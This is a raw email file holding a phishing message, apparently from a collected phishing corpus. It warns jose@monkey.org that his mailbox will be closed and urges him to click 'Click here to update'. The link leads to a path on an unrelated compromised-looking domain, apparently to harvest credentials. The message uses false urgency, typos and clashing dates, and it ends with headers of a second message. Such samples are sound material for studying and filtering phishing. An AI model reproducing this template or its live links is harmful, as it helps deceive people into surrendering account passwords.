From: "ADMIN SUPPORT" <test@i-titan.net>
Date: Tue, 25 Sep 2018 05:02:57 +0100
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 587

You will not see this in a MIME-aware mail reader.
--===============1295703278==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

      Attention jose@monkey.org ,  EMAIL SEVER WARNING
   =

 We inform you that your account (jose@monkey.org) will be closed on 26/09/=
2019 because you have been ignoring all our update messages sent to you.

If you wish to continue using your account,update now to continue using our=
 service. =

 =


  =

   Click here to update


 Notice: Ignoring this message will cause your account to be terminated wit=
hout your permission.

Thanks ,
Sincerely
 Mail Protector =A92018. =


 =



 =




--===============1295703278==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY>&nbsp; =

<DIV dir=3Dltr>
<DIV dir=3Dltr>
<DIV id=3Dm_7227338578136775811m_-636958430337141466m_3474587334973311389m_=
-6027917091920516357m_2156374528270712454m_1503857879529713213gmail-m_75459=
83715347819261m_2068771338125472427gmail-x_m_-2532106838559951497m_46993797=
20687121158gmail-x_m_5425962167380612437m_9014338626228315285m_-47687880819=
88510280m_5955470442327627584m_-4937096695799151235m_-205241381462015941gma=
il-x_m_3407182822029326097m_8434509536876198230m_-2512664922434963013gmail-=
x_gmail-m_-7824955940309880813m_7957650066674655453m_-1220709208784371552m_=
-5459006908725974065gmail-x_divRplyFwdMsg style=3D"BORDER-LEFT-WIDTH: 0px; =
BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px=
; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PA=
DDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px">
<DIV style=3D'BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 16px; FONT-FAMILY: Calibri=
,Helvetica,sans-serif,EmojiFont,"Apple Color Emoji","Segoe UI Emoji",NotoCo=
lorEmoji,"Segoe UI Symbol","Android Emoji",EmojiSymbols; BORDER-RIGHT-WIDTH=
: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(0,0,0=
); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; P=
ADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px'><SPAN style=3D"BORDER-LEFT-WIDTH:=
 0px; FONT-SIZE: 31pt; FONT-FAMILY: Calibri,Helvetica,sans-serif,serif,Emoj=
iFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WID=
TH: 0px; COLOR: rgb(38,114,236); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PAD=
DING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px"></S=
PAN>
<DIV style=3D"FONT-SIZE: small; FONT-FAMILY: Arial,Helvetica,sans-serif; CO=
LOR: rgb(34,34,34); BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D"FONT=
-FAMILY: Verdana,Geneva,sans-serif; COLOR: rgb(51,51,51)">Attention</SPAN><=
SPAN style=3D"FONT-FAMILY: Verdana,Geneva,sans-serif; COLOR: rgb(51,51,51)"=
> <FONT color=3D#333333 face=3D"Verdana, Geneva, sans-serif"><B style=3D"FO=
NT-SIZE: 16px; FONT-FAMILY: Calibri,Arial,Helvetica,sans-serif,serif,EmojiF=
ont; COLOR: rgb(0,128,0); BACKGROUND-COLOR: rgb(255,255,255)"><A style=3D"C=
OLOR: rgb(17,85,204)" rel=3D"noopener noreferrer" target=3D_blank>jose@monk=
ey.org</A></B></FONT> </SPAN><SPAN style=3D"FONT-FAMILY: Verdana,Geneva,san=
s-serif; COLOR: rgb(51,51,51)"><SPAN style=3D"FONT-FAMILY: Verdana,Geneva,s=
ans-serif; COLOR: rgb(51,51,51)">,</SPAN> </SPAN></DIV></DIV>
<DIV style=3D'BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 16px; FONT-FAMILY: Calibri=
,Helvetica,sans-serif,EmojiFont,"Apple Color Emoji","Segoe UI Emoji",NotoCo=
lorEmoji,"Segoe UI Symbol","Android Emoji",EmojiSymbols; BORDER-RIGHT-WIDTH=
: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(0,0,0=
); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; P=
ADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px'><SPAN style=3D"BORDER-LEFT-WIDTH:=
 0px; FONT-SIZE: 31pt; FONT-FAMILY: Calibri,Helvetica,sans-serif,serif,Emoj=
iFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WID=
TH: 0px; COLOR: rgb(38,114,236); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PAD=
DING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px">EMA=
IL SEVER WARNING</SPAN><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px">
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px">
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 15px; FONT-FAMILY: inherit=
; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0=
px; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT:=
 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px"><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALI=
GN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0=
px"><FONT color=3D#000000 face=3Dinherit><SPAN style=3D"FONT-SIZE: 15px">We=
 inform you that your account (</SPAN></FONT><FONT color=3D#ff0000 face=3D"=
Calibri, Helvetica, sans-serif, serif, EmojiFont"><SPAN style=3D"FONT-SIZE:=
 15px"><B>jose@monkey.org</B></SPAN></FONT><FONT color=3D#000000 face=3Dinh=
erit><SPAN style=3D"FONT-SIZE: 15px">) will be closed&nbsp;on <B>26</B></SP=
AN></FONT><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 15px; FONT-FAMI=
LY: inherit; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTT=
OM-WIDTH: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; =
PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px">=
<B><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VERTICAL=
-ALIGN: baseline; BORDER-BOTTOM: rgb(204,204,204) 1px dashed; PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x; BORDER-TOP-WIDTH: 0px">/09/2019</SPAN> </B></SPAN><FONT color=3D#000000 =
face=3Dinherit><SPAN style=3D"FONT-SIZE: 15px">because you have been ignori=
ng all our update messages sent to you.</SPAN></FONT><BR><BR><FONT color=3D=
#000000 face=3Dinherit><SPAN style=3D"FONT-SIZE: 15px">If you wish to conti=
nue using your account,update now to continue using our service.&nbsp;</SPA=
N></FONT><BR></DIV>
<P style=3D"FONT-SIZE: 15px; FONT-FAMILY: Calibri,Helvetica,sans-serif,seri=
f,EmojiFont; COLOR: rgb(0,0,0); MARGIN: 0px"><BR></P>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: small; FONT-FAMILY: arial,=
sans-serif,serif,EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseli=
ne; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(33,33,33); PADDING-BOTTOM: 0px; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-=
TOP-WIDTH: 0px">
<TABLE style=3D"MARGIN: 0px; BACKGROUND-COLOR: rgb(9,74,178)">
<TBODY style=3D"WIDTH: 128px">
<TR>
<TD style=3D"FONT-FAMILY: arial,sans-serif; PADDING-BOTTOM: 3px; PADDING-TO=
P: 3px; PADDING-LEFT: 12px; PADDING-RIGHT: 12px"><FONT color=3D#ffffff face=
=3D"Calibri, Helvetica, sans-serif, serif, EmojiFont"><SPAN style=3D"BORDER=
-LEFT-WIDTH: 0px; FONT-SIZE: 16px; FONT-FAMILY: inherit; BORDER-RIGHT-WIDTH=
: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: =
0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; =
BORDER-TOP-WIDTH: 0px"><A id=3Dm_7227338578136775811m_-636958430337141466m_=
3474587334973311389m_-6027917091920516357m_2156374528270712454m_15038578795=
29713213gmail-LPlnk774294 class=3D"m_7227338578136775811m_-6369584303371414=
66m_3474587334973311389m_-6027917091920516357m_2156374528270712454m_1503857=
879529713213gmail-m_7545983715347819261m_2068771338125472427gmail-x_m_-2532=
106838559951497m_4699379720687121158gmail-x_m_5425962167380612437m_90143386=
26228315285m_-4768788081988510280m_5955470442327627584m_-493709669579915123=
5m_-205241381462015941gmail-x_m_3407182822029326097m_8434509536876198230m_-=
2512664922434963013gmail-x_gmail-m_-7824955940309880813m_795765006667465545=
3m_-1220709208784371552m_-5459006908725974065gmail-x_OWAAutoLink m_72273385=
78136775811m_-636958430337141466m_3474587334973311389m_-6027917091920516357=
m_2156374528270712454m_1503857879529713213gmail-m_7545983715347819261m_2068=
771338125472427gmail-x_m_-2532106838559951497m_4699379720687121158gmail-x_m=
_5425962167380612437m_9014338626228315285m_-4768788081988510280m_5955470442=
327627584m_-4937096695799151235m_-205241381462015941gmail-x_OWAAutoLink m_7=
227338578136775811m_-636958430337141466m_3474587334973311389m_-602791709192=
0516357m_2156374528270712454m_1503857879529713213gmail-m_754598371534781926=
1m_2068771338125472427gmail-x_m_-2532106838559951497m_4699379720687121158gm=
ail-x_OWAAutoLink m_7227338578136775811m_-636958430337141466m_3474587334973=
311389m_-6027917091920516357m_2156374528270712454m_1503857879529713213gmail=
-OWAAutoLink" style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; VER=
TICAL-ALIGN: baseline; BACKGROUND: none transparent scroll repeat 0% 0%; BO=
RDER-BOTTOM-WIDTH: 0px; COLOR: white; OUTLINE-WIDTH: medium; PADDING-BOTTOM=
: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px=
; BORDER-TOP-WIDTH: 0px" href=3D"http://www.guoshangtongbao.com/phpmyadmin1=
/themes/pmahomme/css/alesh/X3D-OPIA-DOMAIN/" rel=3D"nofollow noopener noref=
errer" target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=
=3Dhttps://perfexim.nazwa.pl/perfektsystem_new/valid/admin%2520verify/index=
.html&amp;source=3Dgmail&amp;ust=3D1537930548112000&amp;usg=3DAFQjCNEevukOM=
V21CzvcdDAxTpc7pdEYWw">Click here to update</A><BR></SPAN></FONT></TD></TR>=
</TBODY></TABLE><FONT color=3D#ffffff face=3D"Calibri, Helvetica, sans-seri=
f, serif, EmojiFont"><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 16px=
; FONT-FAMILY: inherit; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; =
BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LE=
FT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px"><BR></SPAN=
></FONT></DIV>
<P style=3D"FONT-SIZE: 15px; FONT-FAMILY: Calibri,Helvetica,sans-serif,seri=
f,EmojiFont; COLOR: rgb(0,0,0); MARGIN: 0px">Notice:&nbsp;Ignoring this mes=
sage will cause your account to be terminated without your permission.<BR><=
BR>Thanks ,<BR>Sincerely</P>
<P style=3D"FONT-SIZE: 15px; FONT-FAMILY: Calibri,Helvetica,sans-serif,seri=
f,EmojiFont; COLOR: rgb(0,0,0); MARGIN: 0px">Mail Protector =A92018. <BR></=
P></DIV></DIV></DIV></DIV></DIV>
<P><BR></P><BR>
<P><BR></P><SPAN id=3Dm_7227338578136775811m_-636958430337141466m_347458733=
4973311389m_-6027917091920516357m_2156374528270712454m_1503857879529713213g=
mail-ms-rterangepaste-end></SPAN><BR></BODY></HTML>
--===============1295703278==--

From jose@monkey.org Tue Sep 25 06:47:24 2018 +0000
Return-Path: noreply@support.com
Delivered-To: jose@monkey.org
X-FDA: 74647999608.05.pain10_66061872154c
X-Spam-Summary: 50,0,0,2fec50d75601c743,d41d8cd98f00b204,noreply@support.com,:,RULES_HIT:41:72:327:355:375:379:495:800:962:967:969:973:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1567:1571:1588:1589:1592:1593:1594:1710:1714:1730:1747:1777:1792:1803:2084:2198:2199:2393:2525:2527:2561:2564:2682:2685:2693:2828:2859:2890:2895:2896:2899:2900:2907:2909:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3865:3866:3867:3868:3870:3872:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4552:5007:6119:6238:6261:6300:6669:6674:6678:7688:8603:8957:9010:9025:9040:9344:9416:9908:10004:10231:10346:10954:11473:11657:11658:11914:12043:12050:12051:12295:12438:12551:12555:12891:12895:12903:12955:12958:12959:12986:13139:13439:14096:14515:14829:18000:21080:21433:21450:21451:21524:21627:21804:21810:21819:30001:30016:30022:30026:30054:30056:30070,0,RBL:45.35.198.43:@support.com:.lbl8
X-HE-Tag: pain10_66061872154c
X-Filterd-Recvd-Size: 21566
Received: from support.com (unknown [45.35.198.43])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 25 Sep 2018 06:47:23 +0000 (UTC)
